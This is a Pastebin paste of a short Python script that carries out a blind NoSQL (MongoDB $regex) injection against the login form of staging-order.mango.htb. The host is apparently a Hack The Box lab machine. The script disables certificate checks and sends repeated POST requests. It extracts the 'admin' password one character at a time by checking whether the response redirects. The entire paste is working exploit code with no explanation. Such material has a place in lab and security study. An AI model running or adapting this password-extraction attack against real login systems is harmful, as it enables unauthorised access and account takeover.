Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import requests
- import urllib3
- import string
- import urllib
- urllib3.disable_warnings()
- username="admin"
- password="t"
- u="http://staging-order.mango.htb/index.php"
- headers={'content-type': 'application/x-www-form-urlencoded'}
- while True:
- for c in string.printable:
- if c not in ['*','+','.','?','|']:
- payload='username[$eq]=%s&password[$regex]=^%s' % (username, password + c)
- r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
- if 'OK' in r.text or r.status_code == 302:
- print("Found one more char : %s" % (password+c))
- password += c
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement